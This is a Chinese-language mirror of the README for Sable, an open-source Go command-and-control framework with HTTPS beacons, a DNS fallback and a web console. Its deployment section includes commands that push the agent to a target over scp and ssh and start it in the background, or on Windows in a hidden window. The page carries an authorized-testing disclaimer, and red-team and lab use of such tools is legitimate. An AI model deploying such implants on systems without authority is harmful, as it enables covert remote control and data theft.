aelder202/sable

GitHub: aelder202/sable

一款 Go 语言编写的开源 C2 框架，通过 HTTPS 和 DNS 双通道实现 agent 管理与任务下发，提供 Web UI 和 CLI 双操作界面。

Stars: 2 | Forks: 0

Sable

开源 C2

Go | HTTPS + DNS 传输 | Web UI + CLI

Sable 是一个用 Go 编写的 C2。服务器通过 HTTPS 接收来自 agent 的加密 beacon，并以 DNS 作为备用方式，同时提供浏览器控制台和交互式 CLI 用于下发任务。 ## 界面预览在本地回环 HTTPS 上受密码保护的操作员控制台： ![Sable 登录界面](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/4a337823e9162634.png) 包含命令输出、Task Builder 和完整操作菜单的活动会话视图： ![包含活动会话的 Sable Web 控制台](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/e0e20e1c84162635.png) 跨选定会话的批量任务下发： ![跨 Linux 和 Windows 会话的 Sable 批量任务下发](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/f1ec27e8ad162637.png) 用于查看任务、Artifacts、笔记和审计历史的会话详情侧边栏： ![包含 artifacts、jobs、notes 和 audit 面板的会话详情](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/d066b11635162638.png) 用于选择下载路径的远程文件浏览器： ![下载文件浏览器模态框](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/994e2b8c73162639.png) ## 授权使用 Sable 仅供教育用途、受控实验室、CTF、自有系统，以及您持有书面授权的测试项目使用。请勿将其部署到您不拥有或未获得明确测试许可的系统上。作者对滥用行为不承担任何责任。 ## 系统架构 ``` flowchart LR A["Agent
_{statically compiled
ldflags-configured}"] O["Operator
_{Web UI / CLI}"] S["Sable Server
_{:443 HTTPS · :53/udp DNS
127.0.0.1:8443 API + Web UI}"] A -->|HTTPS beacons :443| S A -.->|DNS fallback :53/udp| S O -->|loopback :8443| S ``` 有关加密细节、网络端口和项目布局，请参阅 [docs/architecture.md](docs/architecture.md)。 ## 前置条件 - Go 1.26.2 或更高版本（与 `go.mod` 匹配） - `make`（Linux、macOS 或 Windows；PowerShell 或 cmd） - 如果绑定 `443`（以及在开启 DNS 备用时绑定 `53`），在服务器主机上需要 Root/管理员权限 Agent 通过 `GOOS`/`GOARCH` 进行交叉编译，因此您可以从任何主机操作系统进行构建。 ## 快速入门 ### 1. 克隆 ``` git clone https://github.com/aelder202/sable cd sable ``` 模块在首次构建时拉取。如果您想预热缓存，可以运行 `go mod download`。 ### 2. 安装构建统一辅助工具，然后让其创建本地配置、TLS 证书、服务器二进制文件、选定的 agent 二进制文件以及 `.sable/install.json` 清单。 ``` make sablectl ./sablectl install --url https://:443 --password-file ./pw.txt ``` `--password-file` 是可选的但建议使用：提供后，`install` 会创建该文件（如果尚不存在则使用随机密码），并在 `.sable/install.json` 中记录其路径。`sablectl start` 和 `sablectl agent register` 会自动复用该路径，因此您无需在每次命令时重新输入 `--password-file`。要构建具有独立身份的 Linux 和 Windows agent： ``` ./sablectl install --url https://:443 --password-file ./pw.txt --agents both --windows-label win01 ``` `SERVER_URL` 是 agent 回连的地址，而不是操作员 UI 的地址。`sablectl install` 会写入 `config.env`、`server.crt`、`server.key`、`.sable/install.json`，并在 `builds//` 下构建产物。这些文件已被 gitignore，并且包含机密信息。 ### 3. 启动将服务器二进制文件、`server.crt` 和 `server.key` 保留在同一目录中。如果您在运行 install 时加了 `--password-file ./pw.txt`，只需运行： ``` ./sablectl start # Linux / macOS .\sablectl.exe start # Windows ``` `start` 会从 `.sable/install.json` 读取密码文件路径。要在单次运行时覆盖它，或者如果您在安装期间跳过了该标志，可以直接指向一个文件： **Linux / macOS** ``` printf '%s' 'yourpassword' > ./pw.txt chmod 600 ./pw.txt ./sablectl start --password-file ./pw.txt ``` **Windows (PowerShell)** ``` Set-Content -Encoding ascii -NoNewline .\pw.txt "yourpassword" .\sablectl.exe start --password-file .\pw.txt ``` `SABLE_OPERATOR_PASSWORD` 和标准输入 (stdin) 同样适用。默认情况下，服务器会将操作员状态持久化到工作目录下的 `sable-state.json` 文件中。这个明文本地文件使得已注册的 agent、排队中的任务、输出历史、笔记、标签、artifacts 和审计事件能够在重启后保留。它包含 agent 机密和任务输出，因此请将其视为与 `config.env` 同等机密。Sable 会收紧生成的敏感文件权限；`sablectl doctor` 会针对宽泛的本地 ACL/模式发出警告，而 `sablectl doctor --fix-permissions` 会对已生成的文件进行权限加固。使用 `--state-file ` 或 `SABLE_STATE_FILE=` 来移动状态文件，或者使用 `--state-file none` 禁用持久化。服务器会打印其 TLS 指纹和监听器状态： ``` [*] TLS cert fingerprint (SHA-256): 3a1f...b9c4 [*] Operator API on https://127.0.0.1:8443 | Agent listener on :443 ``` 该指纹已被内置于 agent 二进制文件中，因为设置过程在编译之前运行。操作员 API 仅绑定到本地回环地址。在服务器主机上直接访问它，或通过隧道访问： ``` ssh -L 8443:127.0.0.1:8443 user@sable-host ``` ### 4. 注册主 Agent 第一个 agent 身份是 `main`。`sablectl install` 会将其构建到 `builds/main/agent-linux`，但只有在服务器 API 运行后才能进行注册。在服务器主机上的第二个终端中，运行： ``` ./sablectl agent register main ``` 如果您在安装期间跳过了 `--password-file`，请在此处传入它（该标志可以放在标签之前或之后）： ``` ./sablectl agent register main --password-file ./pw.txt ./sablectl agent register --password-file ./pw.txt main # same thing ``` 不带标签的 `register` 会注册所有本地已知的身份。要在一次操作中启动服务器并注册生成的身份，请在 install 中使用 `--start` 运行： ``` ./sablectl install --url https://:443 --password-file ./pw.txt --start ``` ### 5. 添加或重建 Agent 创建另一个本地身份，然后构建它： ``` ./sablectl agent add windows --label win01 ./sablectl agent build win01 ./sablectl agent register win01 ``` 在源代码更改后，重新构建而无需记住更改了哪个目标： ``` ./sablectl rebuild ``` ### 6. 部署 Agent Linux： ``` scp builds/main/agent-linux user@target:/tmp/agent ssh user@target "chmod +x /tmp/agent && /tmp/agent &" ``` Windows： ``` make build-agent-windows Copy-Item .\builds\main\agent.exe C:\Temp\agent.exe Start-Process -FilePath C:\Temp\agent.exe -WindowStyle Hidden ``` Agent 将在一个 beacon 间隔内显示在控制台中。 ### 7. 打开控制台在服务器主机上访问 `https://127.0.0.1:8443`（或通过隧道访问）。接受自签名证书并使用操作员密码登录。登录后，控制台将列出已注册的会话、最后可见状态、输出以及 Task Builder。 ## 文档 - [架构](docs/architecture.md) — 图表、加密、网络端口、项目布局 - [操作员界面](docs/operator-interfaces.md) — Web UI、CLI、添加 agent、手动注册 - [任务参考](docs/tasks.md) — Task Builder 操作、任务笔记、完整任务表 - [REST API](docs/api.md) — 端点摘要，完整规范位于 [`docs/openapi.yaml`](docs/openapi.yaml) (OpenAPI 3.0.3) - [DNS 备用方案](docs/dns-fallback.md) — 使用可选 DNS 传输运行 - [开发](docs/development.md) — 重新安装、重新构建、构建目标、测试、配置、配置文件、密码来源 - [安全模型](docs/security.md) — 供审查和防御者参考的设计说明 - [故障排除](docs/troubleshooting.md) — 常见错误及检查要点 ## 许可证 GPL-3.0。详见 [LICENSE](LICENSE)。

标签：C2框架, CTF安全, DNS隧道, EVTX分析, Go语言, HTTPS通信, TCP SYN 扫描, Web UI, 代理控制, 命令与控制, 命令行界面, 安全学习资源, 安全测试, 底层编程, 开源安全工具, 攻击性安全, 日志审计, 流量加密, 程序破解, 网络信息收集, 网络安全, 网络安全实验, 远程管理, 逆向工程平台, 隐私保护